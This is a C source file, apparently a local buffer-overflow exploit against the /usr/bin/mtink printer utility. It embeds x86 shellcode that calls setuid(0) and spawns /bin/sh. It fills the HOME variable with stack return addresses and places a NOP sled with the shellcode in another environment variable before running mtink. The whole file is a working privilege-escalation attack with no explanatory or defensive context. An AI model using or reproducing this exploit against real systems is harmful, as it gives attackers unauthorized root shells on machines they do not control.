#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

#define bsize 1400

char buffer[bsize];

char shel[2000];

char *get_sp() {
asm("movl %esp, %eax");
}

int main(int n, char **v) {
int i, off, align;

align = 0;

if (n > 1) off = atoi(v[1]); //nice code!

for(i=0;i<align;i++) buffer[i] = 0x41;
for(i=align;i<(bsize-4);i+=4) *(char **)&buffer[i] = get_sp()-off;

setenv("HOME", buffer, 1);

memset(shel, 0x90, 2000);

for(i=0;i<strlen(shellcode);i++) shel[(i+2000-strlen(shellcode))]=shellcode[i];
setenv("shellcode", shel, 1);

execl("/usr/bin/mtink", "/usr/bin/mtink", 0);
}